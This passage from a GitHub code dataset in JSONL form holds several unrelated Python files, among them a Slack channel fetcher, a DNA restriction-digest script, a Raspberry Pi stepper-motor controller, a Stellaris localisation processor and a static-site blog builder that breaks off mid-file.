get_transcripts_detailes('https://www.fool.com/earnings/call-transcripts/2023/02/09/xpo-xpo-q4-2022-earnings-call-transcript/')\r\n print(dict_)\r\n ","repo_name":"sinanazem/financial-data-collection","sub_path":"earnings-call/motly-fool/fool_earnings_calls_details.py","file_name":"fool_earnings_calls_details.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"71969064044","text":"# coding:utf-8\n\nINF = float('inf')\n\n\ndef inpl(): return list(map(int, input().split()))\n\n\nN = int(input())\nN = str(N)\nans = ''\nfor n in N:\n if n == '1':\n ans += '9'\n else:\n ans += '1'\nprint(ans)\n","repo_name":"uni745e/AtCoder_answers","sub_path":"abc111/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71156422445","text":"def cadastrar_numero(codigo, defeito):\n if(codigo not in mouses.keys()):\n mouses[codigo]=[]\n lista = mouses[codigo]\n if (5 in lista):\n mouses[codigo]=[5]\n lista = mouses[codigo]\n print(\"O mouse não possui defeitos \\n\")\n elif(4 in lista):\n mouses[codigo]=[4]\n lista = mouses[codigo]\n print(\"O mouse não pode ter mais defeitos pois está quebrado ou inutilizado \\n\") \n elif (defeito in lista):\n print(\"Defeito já cadastrado \\n\")\n elif(defeito not in lista and len(lista) < 4):\n lista.append(defeito)\n mouses[codigo]=lista\n\ndef retira_defeito_opcoes(numero):\n for k, i in mouses.items():\n if k == numero:\n if 1 in i:\n listaValidaDef.pop(1, '')\n if 2 in i:\n listaValidaDef.pop(2, '') \n if 3 in i:\n listaValidaDef.pop(3, '') \n elif listaValidaDef == {}:\n print(\"Todas as opções de defeito foram utilizado\") \n return print(listaValidaDef.values())\n#dicionário mouse\nmouses = {}\n \n#dicionário defeitos \ndefeitos = {1: 'necessitam da esfera',\n 2: 'necessitam de limpeza',\n 3: 'necessitam troca do cabo ou conector',\n 4: 'estão quebrados ou inutilizados',\n 5: 'não tem defeito'}\n\nprint('\\nLista de defeitos: ')\nprint(\"1 - Necessita da esfera\\n2 - Necessita de limpeza\\n3 - Necessita troca do cabo ou conector\\n4 - Quebrado ou inutilizado\\n5 - Não tem defeito\")\n\n\nwhile True:\n listaValidaDef = {1: \"1 - Necessita de esfera\", 2: \"2 - Necessita de limpeza\", 3: \"3 - Necessita troca do cabo ou conector\"}\n num_id = int(input(\"Digite o número de identificação do Mouse: \"))\n if num_id == 0:\n break\n retira_defeito_opcoes(num_id)\n tp_def = int(input(\"Digite o tipo de defeito do mouse: \"))\n while True:\n if 0 < tp_def < 6:\n cadastrar_numero(num_id, tp_def)\n break\n else:\n tp_def = int(input(\"Número de identificação de defeito invalido... Digite novamente: \"))\n \n\nfor id, defeito in defeitos.items():\n print(\"\\n--- Identificação dos mouses que {} ---\".format(defeito))\n qt=0\n for mouse in mouses:\n if id in mouses[mouse]: \n print(\"{}\".format(mouse), end=' ')\n qt+=1\n if (qt == 1):\n print(\"\\nTotal: 1 mouse.\")\n elif (qt > 1):\n print(\"\\nTotal: {} mouses.\".format(qt))\n else:\n print(\"\\nNenhum\\nTotal: -----\")\n\nprint(\"\\n\") ","repo_name":"enzo-b-pagliacci/ComputionalThinkingUsingPython","sub_path":"exercício - 2508/manutencao_ex8_3.py","file_name":"manutencao_ex8_3.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42798371198","text":"import os\nimport os.path as osp\nimport json\nimport requests\n\nfrom .load_config import DotDict\n\n\ndef get_channels_list(config, save=True):\n\n URL = \"https://slack.com/api/conversations.list\"\n TOKEN = config.TOKEN\n\n headers = {\n 'Authorization': 'Bearer '+ str(TOKEN),\n }\n\n response = requests.get(URL, headers=headers)\n resdata = response.json()\n\n if not resdata[\"ok\"]:\n print(\"Error: {}. Cannot get chennel list.\".format(resdata[\"error\"]))\n \n if save:\n os.makedirs(osp.join(config.saveDir,config.workspace), exist_ok=True)\n with open(osp.join(config.saveDir,config.workspace,\"channels.json\"), \"w\", encoding=\"utf8\") as f:\n json.dump(resdata, f, indent=2, ensure_ascii=False)\n\n return [DotDict(c) for c in resdata[\"channels\"]]","repo_name":"Tsukuweb/GetSlackHistory","sub_path":"utils/get_channels_list.py","file_name":"get_channels_list.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"26550706644","text":"from django.urls import path\nfrom doodle.views import PostsListView, PostDetailView, CreatePost, DeletePost\n\n\napp_name = 'doodle'\nurlpatterns = [\n path('', PostsListView.as_view(), name='index'),\n path('post/', PostDetailView.as_view(), name='post_detail'),\n path('post/create', CreatePost.as_view(), name='create_post'),\n path('post/delete/', DeletePost.as_view(), name='delete_post')\n]\n","repo_name":"gladunvv/doodle-blog","sub_path":"app/doodle/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"11801124428","text":"# Lab3-Synchronous\r\nimport numpy as np\r\nimport multiprocessing as mp\r\nfrom time import time\r\n\r\nprint(\"Number of processors: \", mp.cpu_count())\r\n\r\n# Parallelizing using Synchronous execution type\r\n\r\nif __name__ == \"__main__\":\r\n # Prepare data (This is the problem statement)\r\n np.random.RandomState(100)\r\n arr = np.random.randint(0, 10, size=[200000, 5])\r\n data = arr.tolist()\r\n data[:5]\r\n \r\n # Non-parallel solution\r\n def howmany_within_range(row, minimum, maximum):\r\n # Return how many numbers lie within maximum and minimum in a given row\r\n count = 0\r\n for n in row:\r\n if minimum <= n <= maximum:\r\n count = count + 1\r\n return count\r\n \r\n results = []\r\n \r\n for row in data:\r\n results.append(howmany_within_range(row, minimum=4, maximum=8))\r\n \r\n print(results[:10])\r\n \r\n #> [3, 1, 4, 4, 4, 2, 1, 1, 3, 3]\r\n \r\n # Parallel solution (pool.apply(), pool.map() and pool.starmap()\r\n\r\n # This is Pool.apply()\r\n # 1) Initialize multiprocessing.Pool()\r\n pool = mp.Pool(mp.cpu_count())\r\n\r\n # 2) pool.apply() the defined function howmany_within_range()\r\n results = [pool.apply(howmany_within_range, args=(row, 4, 8)) for row in data]\r\n\r\n # 3) Close the pool\r\n pool.close()\r\n\r\n print(results[:10])\r\n #> [3, 1, 4, 4, 4, 2, 1, 1, 3, 3]\r\n \r\n # This is Pool.map()\r\n # 1) Edit the function of howmany_within_range\r\n def howmany_within_range_rowonly(row, minimum=4, maximum=8):\r\n count = 0\r\n for n in row:\r\n if minimum <= n <= maximum:\r\n count = count + 1\r\n return count\r\n \r\n pool = mp.Pool(mp.cpu_count())\r\n \r\n \r\n results = pool.map(howmany_within_range_rowonly, [row for row in data])\r\n \r\n # 3) Close the pool\r\n pool.close()\r\n \r\n print(results[:10])\r\n #> [3, 1, 4, 4, 4, 2, 1, 1, 3, 3]\r\n \r\n # This is Pool.starmap()\r\n pool = mp.Pool(mp.cpu_count())\r\n\r\n # 1) pool.map() the defined function howmany_within_range()\r\n results = pool.starmap(howmany_within_range, [(row, 4, 8) for row in data])\r\n\r\n # 2) Close the pool\r\n pool.close()\r\n\r\n print(results[:10])\r\n #> [3, 1, 4, 4, 4, 2, 1, 1, 3, 3]\r\n","repo_name":"mohdelfariz/distributed-parallel","sub_path":"Lab3-synchronous.py","file_name":"Lab3-synchronous.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"42414021219","text":"#!/usr/bin/env python3\n# 52digest.py\n\nimport re\nimport sys\n\n# Write a program that performs an EcoRI digest on the SARS-COV2 genome\n# The program should have 2 arguments\n# 1. The genome file\n# 2. The restriction pattern\n# The output should be the sizes of the restriction fragments\n\n\n#isolate genome from data file\nfilename = sys.argv[1]\nrefrag = sys.argv[2]\ngenome = ''\nwith open(filename) as fp:\n for line in fp.readlines():\n line = line.rstrip() #make into continuous line\n if 'ORIGIN' in line: #genome starts after the word origin\n genome = ''\n else:\n line = line.split()[1:]\n genome += ''.join(line)\n#look for all of the restriction patterns 'gaattc' in genome\nbefore = 0\nfor match in re.finditer(refrag, genome):\n size = match.start() - before\n before = match.start()\n print(size)\n\"\"\"\npython3 52digest.py ../Data/sars-cov2.gb gaattc\n1160\n10573\n5546\n448\n2550\n2592\n3569\n2112\n1069\n\"\"\"\n","repo_name":"tiffsiu/homework","sub_path":"52digest.py","file_name":"52digest.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40741118283","text":"import json\nimport re\nimport os\n\nfrom FoolDonkeyAssignment import pdx_logic, \\\n pdx_replace_dict\nfrom danteng import Danteng\nfrom paradox_parser import ParadoxParser\n\n# 处理本地化文件\n# 对蠢驴思维做处理,防止找不到对应的文字\n\n\n# 读取所有中英文本地化文本\ndef load_i18n(base_path, purge):\n obj_path = 'i18n.obj'\n if (not purge) and os.path.exists(obj_path):\n temp = Danteng.load_obj(obj_path)\n return dict(temp[0]), dict(temp[1])\n\n zhcn_path = 'localisation\\\\simp_chinese'\n zhcn_path_mod = r'L:\\python_working_dir\\stellaris\\localisation'\n en_path = 'localisation\\\\english'\n # 读取本地化文档\n i18n_zhcn_map = dict()\n i18n_en_map = dict()\n\n Danteng.log('----------英文文本----------')\n for filename in os.listdir(os.path.join(base_path, en_path)):\n if filename[-4:] == '.yml':\n i18n_en_map.update(_load_i18n(os.path.join(base_path, en_path, filename)))\n\n i18n_zhcn_map.update(i18n_en_map)\n\n Danteng.log('----------中文文本----------')\n for filename in os.listdir(os.path.join(base_path, zhcn_path)):\n if filename[-4:] == '.yml':\n i18n_zhcn_map.update(_load_i18n(os.path.join(base_path, zhcn_path, filename)))\n\n Danteng.log('----------修正文本----------')\n for filename in os.listdir(zhcn_path_mod):\n if filename[-4:] == '.yml':\n i18n_zhcn_map.update(_load_i18n(os.path.join(zhcn_path_mod, filename)))\n\n Danteng.save_obj((i18n_zhcn_map, i18n_en_map), obj_path)\n return i18n_zhcn_map, i18n_en_map\n\n\ndef load_synced(base_path, purge):\n obj_path = 'i18n.obj'\n if (not purge) and os.path.exists(obj_path):\n temp = Danteng.load_obj(obj_path)\n return dict(temp[0]), dict(temp[1])\n\n zhcn_path = base_path\n en_path = base_path\n\n # 读取本地化文档\n i18n_zhcn_map = dict()\n i18n_en_map = dict()\n\n for filename in os.listdir(os.path.join(base_path, en_path)):\n if filename[-4:] == '.yml' and filename[-7:] != '_SC.yml':\n i18n_en_map.update(_load_i18n(os.path.join(base_path, en_path, filename)))\n\n i18n_zhcn_map.update(i18n_en_map)\n\n for filename in os.listdir(zhcn_path):\n if filename[-7:] == '_SC.yml':\n i18n_zhcn_map.update(_load_i18n(os.path.join(zhcn_path, filename)))\n\n Danteng.save_obj((i18n_zhcn_map, i18n_en_map), obj_path)\n return i18n_zhcn_map, i18n_en_map\n\n\ndef _load_i18n(path):\n i18n = ParadoxParser(path)\n return i18n.get_data()[0]\n\n\n# 替换掉以下几个蠢驴规则:\n# * MOD_开头的\n# * \\$(.*?)\\$ 文字变量\ndef replace(in_map):\n out_map = dict()\n for key in in_map:\n # 替换掉 '$(.*?)$'\n findall = re.findall(r'\\$(.*?)\\$', in_map[key])\n for find_key in findall:\n if find_key == 'RESOURCE':\n break\n if find_key in pdx_replace_dict:\n in_map[key] = in_map[key].replace('$%s$' % find_key, '$%s$' % pdx_replace_dict[find_key])\n find_key = pdx_replace_dict[find_key]\n if find_key in in_map:\n new_text = in_map[find_key]\n in_map[key] = in_map[key].replace('$%s$' % find_key, new_text)\n elif find_key + '_01' in in_map:\n new_text = in_map[find_key + '_01']\n in_map[key] = in_map[key].replace('$%s$' % find_key, new_text)\n all_text = in_map[key]\n for i in range(2, 99):\n temp_key = '_%02d' % i\n new_key = key + temp_key\n if find_key + temp_key in in_map:\n all_text +=' 或 '\n new_text = in_map[find_key + temp_key]\n temp_text = in_map[key].replace('$%s$' % find_key, new_text)\n out_map[new_key] = temp_text\n all_text +='\\\"' + temp_text + '\\\"'\n # Danteng.log(key + '|' + new_key + '|' + out_map[new_key])\n else:\n break\n in_map[key] = all_text\n # Danteng.log('多种情况:' + key + '|' + in_map[key])\n elif find_key + '_1' in in_map:\n new_text = in_map[find_key + '_1']\n in_map[key] = in_map[key].replace('$%s$' % find_key, new_text)\n elif len(find_key)>=5 and find_key[0:-5] + '_1_desc' in in_map:\n new_text = in_map[find_key[0:-5] + '_1_desc']\n in_map[key] = in_map[key].replace('$%s$' % find_key, new_text)\n # elif find_key in fool_donkey_dict:\n # in_map[key] = in_map[key].replace('$%s$' % find_key, fool_donkey_dict[find_key])\n # else:\n # Danteng.log('原文没找到' + find_key + '\\t\\t\\t\\t' + key + ': ' + in_map[key])\n z = 1\n # in_map[key] = in_map[key].replace('\\\\n', '
')\n # # 替换掉 'MOD'开头的\n if key[0:4] == 'MOD_' or key[0:4] == 'mod':\n out_map[key[4:].lower()] = in_map[key]\n # Danteng.log(key + '|' + key[4:].lower() + '|' + zhcn_map[key[4:].lower()])\n # else:\n # out_map[key] = in_map[key]\n # Danteng.log(in_map[key])\n for key in pdx_replace_dict:\n if pdx_replace_dict[key] in in_map:\n out_map[key] = in_map[pdx_replace_dict[key]]\n else:\n out_map[key] = pdx_replace_dict[key]\n Danteng.log('没找到' + pdx_replace_dict[key])\n for key in in_map:\n if key != key.lower() and (not key.lower() in in_map) and (not key.lower() in out_map):\n out_map[key.lower()] = in_map[key]\n in_map.update(out_map)\n return in_map\n\n\ndef processor(path, synced_path='', purge=True):\n # 读取本地化文档\n i18n_zhcn_map, i18n_en_map = load_i18n(path, purge)\n\n for i in range(2):\n i18n_en_map = replace(i18n_en_map)\n i18n_zhcn_map = replace(i18n_zhcn_map)\n\n for item in pdx_logic:\n if pdx_logic[item]['value'] in i18n_zhcn_map:\n pdx_logic[item]['value'] = i18n_zhcn_map[pdx_logic[item]['value']]\n if synced_path != '':\n zhcn_map, en_map = load_synced(synced_path, purge)\n zhcn_map.update(i18n_zhcn_map)\n en_map.update(i18n_en_map)\n i18n_zhcn_map = zhcn_map\n i18n_en_map = en_map\n return i18n_zhcn_map, i18n_en_map\n\n\nif __name__ == '__main__':\n data_path = 'F:\\\\Steam\\\\steamapps\\\\common\\\\Stellaris\\\\'\n\n # 输出json方便查看\n cn_map, en_map = processor(data_path, True)\n cn_json = json.dumps(cn_map, ensure_ascii=False)\n with open('F:\\\\PycharmProjects\\\\stellaris_data_processer\\\\json\\\\cn.json', 'w', encoding='UTF-8') as f:\n f.write(cn_json)\n\n en_json = json.dumps(en_map, ensure_ascii=False)\n with open('F:\\\\PycharmProjects\\\\stellaris_data_processer\\\\json\\\\en.json', 'w', encoding='UTF-8') as f:\n f.write(en_json)\n z = 1\n","repo_name":"HuijiWiki/qunxing","sub_path":"stellaris_data_processer/processor.py","file_name":"processor.py","file_ext":"py","file_size_in_byte":6902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74663782124","text":"#!/usr/bin/env python\n\n\n# Import required libraries\n\nfrom flask import Flask, render_template_string, request # Importing the Flask modules\nfrom time import sleep # Import sleep module from time library \nimport sys\nimport time\nimport RPi.GPIO as GPIO\n'''\nGPIO.setmode(GPIO.BCM)\n\n#Define GPIO signals to use\n# Set all pins as output\nGPIO.setup(18,GPIO.OUT)\nGPIO.setup(22,GPIO.OUT)\nGPIO.output( 18, GPIO.False )\nGPIO.output( 22, GPIO.LOW )'''\n#GPIO.cleanup()\n#p#rint(\"Setting up pins\")\n\n#GPIO.setup(18,GPIO.OUT) # step control pin = 18\n#GPIO.output(18, False) \n#GPIO.setup(22,GPIO.OUT) # direction control pin = 22\n#GPIO.output(22, False)\n\nclass runMotor():\n def __init__(self):\n self.previous_height = 0\n self.time_arr = []\n #self.opposite_direction = False\n self.previous_direction = False\n def initialize_motor(self):\n \n # Use BCM GPIO references instead of physical pin numbers\n GPIO.setmode(GPIO.BCM)\n\n # Define GPIO signals to use\n # Set all pins as output\n print(\"Setting up pins\")\n GPIO.setup(18,GPIO.OUT) # step control pin = 18\n GPIO.output(18, False) \n GPIO.setup(22,GPIO.OUT) # direction control pin = 22\n GPIO.output(22, False)\n\n def cleanup_motor(self):\n GPIO.output( 18, GPIO.LOW )\n GPIO.output( 22, GPIO.LOW )\n GPIO.cleanup()\n \n def return_to_base_height(self):\n #Return motor to base height\n if self.previous_height>=0:\n self.change_motor_height(self.previous_height,False)\n else:\n print ('Error - Motor no longer knows its position')\n \n def change_motor_height(self,height,moves_up):\n self.time_arr.append(time.time())\n if len(self.time_arr)>2 and (self.time_arr[-1] - self.time_arr[-2])<2:\n return\n\n #reinitialize motor\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(18,GPIO.OUT) # step control pin = 18\n GPIO.setup(22,GPIO.OUT) # direction control pin = 22\n \n # Initialise variables\n WaitTime = 0.05 # changed to 500ms\n stepCounter = 0\n stepsToRotate = height*1000*(1/0.3) # convert meters to steps (1 step = 0.3mm)\n #stepsToRotate = 898\n \n print(\"Steps to rotate received:\",int(stepsToRotate))\n print(\"moves_up\",moves_up)\n \n #Initialize if motor moves up or down and set GPIO\n if moves_up == True and stepsToRotate!=0:\n GPIO.output( 22, GPIO.LOW) # high is clockwise and low is counterclockwise\n self.previous_height = self.previous_height+height\n \n elif moves_up is False and stepsToRotate!=0:\n GPIO.output(22,GPIO.HIGH)\n self.previous_height = self.previous_height-height\n else:\n return\n \n if moves_up !=self.previous_direction:\n height = height +0.02\n \n #Move motor determined amount of steps\n for stepCounter in range(abs(int(stepsToRotate))):\n #for pin in range(0, 4):\n GPIO.output(18, GPIO.HIGH)\n time.sleep(WaitTime/2)\n GPIO.output(18, GPIO.LOW)\n time.sleep(WaitTime/2)\n \n #Clean GPIO output\n GPIO.output( 18, False )\n GPIO.output( 22, False )\n self.previous_direction = moves_up\n \n return height\n'''\nmotor = runMotor()\nmotor.initialize_motor()\ntime1 = time.time()\nmotor.change_motor_height(0.01,False)\n'''\n#tim'''e.sleep(5)\n#motor.change_motor_height(0.03,True)\n#print (time.time()-time1)\n","repo_name":"anne-mei/fydp-neofeed","sub_path":"pi_code/for_motors/runMotor.py","file_name":"runMotor.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"43479078294","text":"from jinja2 import Environment, FileSystemLoader, Markup\n#import PyRSS2Gen as RSS2\nfrom pyatom import AtomFeed\nimport codecs\nimport gettext\nimport locale\nfrom math import ceil\nfrom datetime import datetime\nfrom struri import slugify, link_to, strip_html_tags#\nfrom meta import Meta#\nfrom mulang import Mulang#\nimport shutil\nimport os\n\n\nclass Builder:\n \"\"\"Site building process manager.\n \n .. todo:: Remove redundant code using a universal method for\n retrieve and gather the data; and use subclasses.\n\n .. todo:: Manage better with timezones. Make sure if there is no\n timezone the default is always UTC, for posts info, and\n both feeds pub. dates.\n\n .. todo:: Fix the way the variables are passed on the init. Grouping\n by lists or dictionaries could simplify much the\n constructor.\n\n i.e.:\n\n uri [ 'canonical': 'http://where.my_site.is/', 'base': '' ]\n wlocale = [ 'locale': \"utf-8\", 'encoding': \"en_US\" ]\n date_fmts = [ 'long': \"%c\", 'short': '%Y-%M-%D', 'mini': \"%B, %Y\",\n site = [ 'name': \"My Blog\", 'description': \"Nice description.\",\n 'author': \"Me\", 'max_entries': \"10\", 'feed_fmt': \"atom\"]\n\n def __init__(self, uri, wlocale, site, date_fmts,\n template_values, extra_dirs, infile_ext,\n verbose=True):\n \"\"\"\n\n def __init__(self, canonical_uri, base_uri='', deploy_dir='_build',\n template_values=dict(), wlocale='en_US', encoding='utf-8',\n max_entries=10, date_format_entries='%c',\n date_format_list='%Y-%m-%d', date_format_home='%Y-%m-%d',\n extra_dirs=None, site_name='', site_description='Feed',\n site_author='', feed_format='atom', infile_ext='.mkdn',\n verbose=True):\n \"\"\"Constructor.\n\n :param template_values: Common values in all templates\n :type template_values: dict\n :param wlocale: Working locale; locale of the generated site\n :type wlocale: str\n \"\"\"\n self.max_entries = max_entries\n self.template_values = template_values\n self.wlocale = wlocale\n self.encoding = encoding\n self.base_uri = base_uri\n self.deploy_dir = os.path.join(deploy_dir, base_uri)\n self.date_format_list = date_format_list\n self.date_format_entries = date_format_entries\n self.date_format_home = date_format_home\n self.canonical_uri = canonical_uri\n self.site_name = site_name\n self.site_author = site_author\n self.feed_format = feed_format\n self.site_description = site_description\n self.extra_dirs = extra_dirs\n self.infile_ext = infile_ext\n self.verbose = verbose\n\n # Set locale for the site.\n self.old_locale = locale.getlocale()\n self.current_locale = locale.setlocale(locale.LC_ALL,\n self.wlocale)\n\n # Constants-like (I don't like this approach)\n #source dirs.\n self_dir = os.path.dirname(os.path.realpath(__file__))\n self.locale_dir = os.path.join(self_dir, 'locale')\n self.builtin_templates_dir = os.path.join(self_dir, 'templates')\n\n #dest. dirs.\n self.home_cont_dir = 'page' # home paginator\n self.tags_dir = 'tags' # one dir. per tag\n\n #src. & dest. dirs.\n self.pages_dir = '.' # other pages such as 'About'\n self.entries_dir = 'posts' # where posts are\n self.static_dir = 'static' # CSS and JS\n self.templates_dir = 'templates' # Layout base template\n\n\n def __del__(self):\n \"\"\"Destructor.\"\"\"\n # Restores locale\n return locale.setlocale(locale.LC_ALL, self.old_locale)\n\n\n def render_template(self, template, output_data, values):\n \"\"\"Renders a template using Jinja2.\n\n :param template: Template to use\n :type template: str\n :param output_data: File where the data is saved\n :type output_data: str\n :return: Generated HTML of the output data\n :rtype: str\n \"\"\"\n trans = gettext.translation('default', self.locale_dir,\n [self.current_locale]) # locale has to be set!\n env = Environment(extensions=['jinja2.ext.i18n'],\n loader=FileSystemLoader([self.templates_dir,\n self.builtin_templates_dir]))\n env.install_gettext_translations(trans)\n env.globals['slugify'] = slugify # <- adds `slugify` to Jinja2\n env.globals['strip_html_tags'] = strip_html_tags\n template = env.get_template(template)\n html = template.render(**values)\n output_file = codecs.open(output_data, mode=\"w\",\n encoding=self.encoding)\n output_file.write(html)\n\n return html\n\n\n def entry_link_prefix(self, entry):\n \"\"\"Compute entrie final path.\"\"\"\n meta = Meta(Mulang(os.path.join(self.entries_dir, entry),\n self.encoding).metadata())\n date = meta.date('%Y-%m-%d')\n date_arr = date.split('-')\n path = os.path.join(str(self.entries_dir),\n str(date_arr[0]),\n str(date_arr[1]),\n str(date_arr[2]))\n return path\n\n\n def gen_entry(self, infile, date_format='%c'):\n \"\"\"Generate a HTML entry from its Mardkdown counterpart.\n\n :param infile: Markdown file to parse\n :type infile: str\n :param date_format: Date format for entry\n :type date_format: str\n :return: Generated HTML\n :rtype: str\n \"\"\"\n inpath = os.path.join(self.entries_dir, infile)\n ml = Mulang(inpath, self.encoding)\n meta = Meta(ml.metadata())\n content_html = ml.html(verbose=self.verbose)\n\n timezone = meta.date('%z')\n if timezone:\n # to html5 timezone conv.\n timezone = timezone[:3] + ':' + timezone[3:]\n datehtml = meta.date('%Y-%m-%dT%H:%M') + timezone\n\n values = self.template_values.copy()\n values['entry'] = { #append\n 'title': meta.title(),\n 'raw_title': strip_html_tags(meta.title()),\n 'private': meta.private(),\n 'comments': meta.comments(),\n 'date': meta.date(date_format),\n 'datehtml': datehtml,\n 'tags': meta.tag_list(),\n 'content': content_html }\n outfile = link_to(slugify(strip_html_tags(meta.title())),\n os.path.join(self.deploy_dir,\n self.entry_link_prefix(infile)))\n return self.render_template('entry.html.j2', outfile, values)\n\n\n def gen_entries(self, date_format='%c'):\n \"\"\"Generate all entries.\n\n :param date_format: Date format for entry\n :type date_format: str\n \"\"\"\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n self.gen_entry(filename, date_format=date_format)\n\n\n def gen_home(self, max_entries_per_page=10, date_format='%Y-%m-%d'):\n \"\"\"Generate home page, and subpages.\n\n :param max_entries: Max. entries per page\n :type max_entries: int\n :param date_format: Date format for home page\n :type date_format: str\n \"\"\"\n entries = list()\n total_entries = 0\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n inpath = os.path.join(self.entries_dir, filename)\n meta = Meta(Mulang(inpath, self.encoding).metadata())\n\n private = meta.private()\n title = meta.title()\n summary = meta.summary()\n date = meta.date(date_format)\n date_idx = meta.date('%Y-%m-%d %H:%M:%S')\n uri = link_to(slugify(strip_html_tags(title)),\n os.path.join('/', self.base_uri,\n self.entry_link_prefix(filename)),\n makedirs=False, justdir=True)\n\n # Generate archive\n if not private:\n total_entries += 1\n val = { 'title': title, 'summary': summary,\n 'date': date, 'date_idx': date_idx,\n 'uri': uri }\n entries.append(val)\n\n # Sort chronologically descent\n entries = sorted(entries, key=lambda k: k['date_idx'],\n reverse=True)\n\n total_pages = ceil(total_entries / max_entries_per_page)\n values = self.template_values.copy()\n\n # FIXME :: Merge this scenario with the following loop\n #Generate 'index.html' even when there are no posts\n if total_entries == 0:\n outfile = link_to('', self.deploy_dir)\n self.render_template('entries.html.j2', outfile, values)\n\n # Home page (and subsequent ones)\n for cur_page in range(1, total_pages + 1):\n min_page = (cur_page - 1) * max_entries_per_page\n max_page = cur_page * max_entries_per_page\n\n values['entries'] = entries[min_page:max_page]\n values['cur_page'], values['total_pages'] = cur_page, total_pages\n\n if cur_page == 1:\n # the home page, the \"index.html\" of the site\n outfile = link_to('', self.deploy_dir)\n else:\n # subsequent pages other that the first\n outfile = link_to(str(cur_page),\n os.path.join(self.deploy_dir,\n self.home_cont_dir))\n self.render_template('entries.html.j2', outfile, values)\n values['entries'] = {} # reset the entries dict.\n\n\n def gen_archive(self, date_format='%c'):\n \"\"\"Generate complete archive.\n\n :param date_format: Date format for entry\n :type date_format: str\n \"\"\"\n archive = dict()\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n post = os.path.join(self.entries_dir, filename)\n meta = Meta(Mulang(post, self.encoding).metadata())\n\n private = meta.private()\n title = meta.title()\n #summary = meta.summary()\n date = meta.date(date_format)\n date_info = meta.date_info()\n date_idx = meta.date('%Y-%m-%d')\n comments = meta.comments()\n uri = link_to(slugify(strip_html_tags(title)),\n self.entry_link_prefix(filename),\n makedirs=False, justdir=True)\n\n # Generate archive\n if not private:\n val = { 'uri': uri, 'title': title, 'date': date,\n 'date_idx': date_idx,\n 'comments': comments }\n d = datetime.strptime(meta.date('%Y-%m-%d'), '%Y-%m-%d')\n idx_year = d.strftime('%Y')\n idx_month = d.strftime('<%m> %B')#%m is to sort chronologically\n if idx_year in archive:\n if idx_month in archive[idx_year]:\n archive[idx_year][idx_month].append(val)\n else:\n archive[idx_year][idx_month] = [val]\n #sort entries\n archive[idx_year][idx_month] = sorted(archive[idx_year][idx_month], key=lambda k: k['date_idx'])\n else:\n archive[idx_year] = dict()\n archive[idx_year][idx_month] = [val]\n\n values = self.template_values.copy()\n values['archive'] = archive\n outfile = link_to('archive.html', self.deploy_dir)\n return self.render_template('archive.html.j2', outfile, values)\n\n\n def gen_tags(self, date_format='%c'):\n \"\"\"Generate tags pages.\n\n :param date_format: Date format for entry\n :type date_format: str\n \"\"\"\n entries_by_tag = dict()\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n post = os.path.join(self.entries_dir, filename)\n meta = Meta(Mulang(post, self.encoding).metadata())\n\n private = meta.private()\n title = meta.title()\n summary = meta.summary()\n tag_list = meta.tag_list()\n date = meta.date(date_format)\n date_idx = meta.date('%Y-%m-%d')\n uri = link_to(slugify(strip_html_tags(title)),\n self.entry_link_prefix(filename),\n makedirs=False, justdir=True)\n\n # Generate archive\n if not private:\n val = { 'uri': uri, 'title': title, 'date': date,\n 'date_idx': date_idx }\n for tag in tag_list:\n if tag in entries_by_tag:\n entries_by_tag[tag].append(val)\n else:\n entries_by_tag[tag] = [val]\n\n # One page for each tag\n values = self.template_values.copy()\n for tag in entries_by_tag:\n values['tag_name'] = tag\n values['entries'] = entries_by_tag[tag]\n #sort entries\n values['entries'] = sorted(values['entries'], key=lambda k:\n k['date_idx'], reverse=True)\n outfile = link_to(tag, os.path.join(self.deploy_dir, self.tags_dir))\n self.render_template('tag.html.j2', outfile, values)\n\n\n def gen_tag_cloud(self):\n \"\"\"Generate tags cloud page.\"\"\"\n entries_by_tag = dict()\n for filename in os.listdir(self.entries_dir):\n if os.path.splitext(filename)[1] == self.infile_ext:\n post = os.path.join(self.entries_dir, filename)\n meta = Meta(Mulang(post, self.encoding).metadata())\n private = meta.private()\n title = meta.title()\n tag_list = meta.tag_list()\n\n # Generate archive\n if not private:\n val = { 'title': title }\n for tag in tag_list:\n if tag in entries_by_tag:\n entries_by_tag[tag].append(val)\n else:\n entries_by_tag[tag] = [val]\n\n # multipliers seq. for tag size in function of times repeated\n tagcloud_seq = [ 0, 14, 21, 27, 32, 38, 42, 45, 47, 48 ]\n\n # One page for each tag\n values = self.template_values.copy()\n values['tags'] = []\n for tag in entries_by_tag:\n if tag:\n tagname, tagfreq = tag, len(entries_by_tag[tag])\n mult = 100 + int(tagcloud_set.last \\\n if tagfreq > len(tagcloud_seq) \\\n else tagcloud_seq[tagfreq - 1])\n values['tags'].append({ tagname: mult })\n\n outfile = link_to('', os.path.join(self.deploy_dir, self.tags_dir))\n self.render_template('tagcloud.html.j2', outfile, values)\n\n\n def gen_page(self, infile):\n \"\"\"Generate a HTNL page from its Mardkdown counterpart.\n\n :param infile: Markdown file to 